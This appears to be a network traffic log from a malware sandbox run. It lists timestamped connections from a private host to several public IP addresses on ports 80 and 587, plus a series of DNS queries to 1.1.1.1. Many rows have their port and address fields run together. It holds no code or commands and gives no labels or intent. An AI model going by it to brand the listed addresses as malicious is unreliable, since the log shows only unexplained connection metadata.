                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.884563923 CET805010818.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.884596109 CET805010818.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.993362904 CET8050037208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:09.993432999 CET5003780192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.313309908 CET5010980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.434521914 CET805010944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.434680939 CET5010980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.446607113 CET5010980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.446607113 CET5010980192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.566854954 CET805010944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:10.566907883 CET805010944.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.174073935 CET805010818.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.174083948 CET805010818.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.174215078 CET5010880192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.174575090 CET5010880192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.295660973 CET805010818.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.356229067 CET5011080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.476416111 CET805011044.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.476684093 CET5011080192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:11.517330885 CET5011080192.168.2.1044.221.84.105
Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Nov 26, 2024 08:16:11.517457962 CET  50110        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:16:11.578910112 CET  80           50109      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:11.579056025 CET  80           50109      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:11.579509020 CET  50109        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:16:11.581478119 CET  50109        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:16:11.637352943 CET  80           50110      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:11.637371063 CET  80           50110      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:11.701992035 CET  80           50109      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:12.667970896 CET  80           50110      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:12.668066025 CET  80           50110      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:12.668133020 CET  50110        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:16:12.675863981 CET  50111        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:12.676104069 CET  50110        80         192.168.2.10     44.221.84.105
Nov 26, 2024 08:16:12.795943975 CET  80           50111      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:12.796000957 CET  80           50110      44.221.84.105    192.168.2.10
Nov 26, 2024 08:16:12.796112061 CET  50111        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:12.808953047 CET  50111        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:12.809279919 CET  50111        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:12.928956985 CET  80           50111      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:12.929244041 CET  80           50111      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:13.006448984 CET  50112        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:13.127546072 CET  80           50112      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:13.129487038 CET  50112        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:13.129847050 CET  50112        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:13.129847050 CET  50112        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:13.250749111 CET  80           50112      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:13.250770092 CET  80           50112      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:14.157366991 CET  80           50111      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:14.157401085 CET  80           50111      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:14.157440901 CET  50111        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:14.157830000 CET  50111        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:14.277837992 CET  80           50111      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:14.536930084 CET  80           50112      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:14.537100077 CET  80           50112      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:14.537159920 CET  50112        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:14.550518036 CET  50112        80         192.168.2.10     54.244.188.177
Nov 26, 2024 08:16:14.564747095 CET  50096        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:14.670850992 CET  80           50112      54.244.188.177   192.168.2.10
Nov 26, 2024 08:16:14.684741974 CET  587          50096      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:14.974519968 CET  587          50096      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:14.976011038 CET  50096        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:14.976016045 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:15.096266985 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:15.099515915 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:16.356379032 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:16.356547117 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:16.476736069 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:16.766685009 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:16.766840935 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:16.886885881 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:17.177259922 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:17.178003073 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:17.298007011 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:17.593924999 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:17.593962908 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:17.593986988 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:17.594293118 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:17.595659971 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:17.715814114 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:18.006030083 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:18.009994030 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:18.130991936 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:18.427614927 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:18.427912951 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:18.548228025 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:18.838449955 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:18.838726044 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:18.958794117 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:19.251854897 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:19.252106905 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:19.372169018 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:19.665607929 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:19.665934086 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:19.785921097 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.079639912 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.080005884 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:20.200340033 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.490206003 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.490586042 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:20.490669966 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:20.490699053 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:20.490747929 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:20.492338896 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:20.611721039 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.611743927 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.611753941 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.611766100 CET  587          50115      51.195.88.199    192.168.2.10
Nov 26, 2024 08:16:20.611789942 CET  50115        587        192.168.2.10     51.195.88.199
Nov 26, 2024 08:16:20.611820936 CET  50115        587        192.168.2.10     51.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613046885 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613068104 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613128901 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613151073 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613172054 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613188982 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613215923 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613246918 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613250017 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613274097 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613308907 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613322973 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613358974 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.613404989 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.731734991 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.731750965 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.731782913 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.731806993 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.731815100 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.731844902 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.731930971 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733094931 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733155012 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733176947 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733186007 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733230114 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733268023 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733356953 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733393908 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733421087 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733438969 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733473063 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733514071 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733525991 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733531952 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.733583927 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.779098988 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.779289007 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.851867914 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.851963043 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.852022886 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.852083921 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.852129936 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.852163076 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.852209091 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.852281094 CET50115587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.853492975 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.853518963 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.853598118 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.853682041 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.853794098 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.853909969 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.853935957 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854010105 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854059935 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854147911 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854182959 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854278088 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854367971 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854378939 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854397058 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.854437113 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.899422884 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.899619102 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.972281933 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.972312927 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.972383022 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.972388029 CET5875011551.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:16:20.972459078 CET5875011551.195.88.199192.168.2.10
Nov 26, 2024 08:16:20.972518921 CET  587          50115      51.195.88.199   192.168.2.10
Nov 26, 2024 08:16:20.972563982 CET  587          50115      51.195.88.199   192.168.2.10
Nov 26, 2024 08:16:20.972620010 CET  587          50115      51.195.88.199   192.168.2.10
Nov 26, 2024 08:16:20.972704887 CET  587          50115      51.195.88.199   192.168.2.10
Nov 26, 2024 08:16:20.972722054 CET  587          50115      51.195.88.199   192.168.2.10
Nov 26, 2024 08:16:20.972769022 CET  587          50115      51.195.88.199   192.168.2.10
Nov 26, 2024 08:16:21.378652096 CET  587          50115      51.195.88.199   192.168.2.10
Nov 26, 2024 08:16:21.591356039 CET  50115        587        192.168.2.10    51.195.88.199
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 26, 2024 08:12:10.656090021 CET  60379        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:11.154912949 CET  53           60379      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:24.230555058 CET  59877        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:24.884664059 CET  53           59877      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:25.521167040 CET  52239        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:25.660736084 CET  53           52239      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:27.842761040 CET  58666        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:27.986515045 CET  53           58666      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:29.567281961 CET  52065        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:30.125250101 CET  53           52065      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:30.611069918 CET  56327        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:30.750901937 CET  53           56327      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:31.433948994 CET  62949        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:31.573709965 CET  53           62949      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:32.636353970 CET  64380        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:33.184936047 CET  53           64380      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:35.233315945 CET  64053        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:35.396832943 CET  62962        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:35.540394068 CET  53           62962      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:35.921961069 CET  53           64053      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:36.537811041 CET  55819        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:36.797333956 CET  53           55819      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:37.384306908 CET  54094        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:37.978775024 CET  53           54094      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:38.629266977 CET  55412        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:38.769233942 CET  53           55412      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:40.975891113 CET  55974        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:41.007483959 CET  57783        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:41.117518902 CET  53           55974      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:41.241782904 CET  53           57783      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:41.335412979 CET  55012        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:42.073157072 CET  53           55012      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:45.153362989 CET  63585        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:45.447588921 CET  53           63585      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:47.041748047 CET  52371        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:47.188865900 CET  53           52371      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:47.189935923 CET  52903        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:47.333585024 CET  53           52903      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:50.319410086 CET  53378        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:50.459703922 CET  53           53378      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:50.479371071 CET  58423        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:50.819638014 CET  53           58423      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:50.828154087 CET  56753        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:51.727387905 CET  53           56753      1.1.1.1         192.168.2.10
Nov 26, 2024 08:12:51.957212925 CET  56753        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:12:52.096924067 CET  53           56753      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:00.072077036 CET  53652        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:00.212852001 CET  53           53652      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:02.228634119 CET  63996        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:02.374197006 CET  53           63996      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:04.663145065 CET  63536        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:04.804775000 CET  53           63536      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:06.396437883 CET  62168        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:06.536839008 CET  53           62168      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:07.874186039 CET  54498        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:08.017218113 CET  53           54498      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:10.734965086 CET  65498        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:10.874861956 CET  53           65498      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:10.876049042 CET  64255        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:11.015513897 CET  53           64255      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:13.249630928 CET  54775        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:13.396037102 CET  53           54775      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:13.396846056 CET  49630        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:13.541676044 CET  53           49630      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:13.542949915 CET  50309        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:13.684986115 CET  53           50309      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:36.813688993 CET  65128        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:37.749196053 CET  53           65128      1.1.1.1         192.168.2.10
Nov 26, 2024 08:13:54.679248095 CET  56799        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:13:54.819523096 CET  53           56799      1.1.1.1         192.168.2.10
Nov 26, 2024 08:14:22.407181025 CET  60597        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:14:23.141470909 CET  53           60597      1.1.1.1         192.168.2.10
Nov 26, 2024 08:14:25.580635071 CET  59594        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:14:26.122195959 CET  53           59594      1.1.1.1         192.168.2.10
Nov 26, 2024 08:14:28.538377047 CET  59950        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:14:29.124969959 CET  53           59950      1.1.1.1         192.168.2.10
Nov 26, 2024 08:14:30.743410110 CET  53547        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:14:31.288252115 CET  53           53547      1.1.1.1         192.168.2.10
Nov 26, 2024 08:14:33.657852888 CET  55509        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:14:34.654184103 CET  55509        53         192.168.2.10    1.1.1.1
Nov 26, 2024 08:14:34.836090088 CET  53           55509      1.1.1.1         192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:34.836111069 CET53555091.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.633970976 CET6395653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.208373070 CET53639561.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.262001991 CET5575353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.406425953 CET53557531.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.767441034 CET5048353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.316154003 CET53504831.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.613444090 CET6181353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.225568056 CET5680653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.365062952 CET53568061.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.513343096 CET53618131.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.238214016 CET5934653192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.570708036 CET5068353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.710607052 CET53506831.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:44.800278902 CET53593461.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.056684017 CET6485253192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.196460962 CET53648521.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:46.997035980 CET6000453192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:47.828318119 CET53600041.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.476106882 CET5385953192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:48.616751909 CET53538591.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.194992065 CET6418353192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:49.767988920 CET53641831.1.1.1192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.343261957 CET5069153192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.354481936 CET5670753192.168.2.101.1.1.1
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:51.496588945 CET53567071.1.1.1192.168.2.10
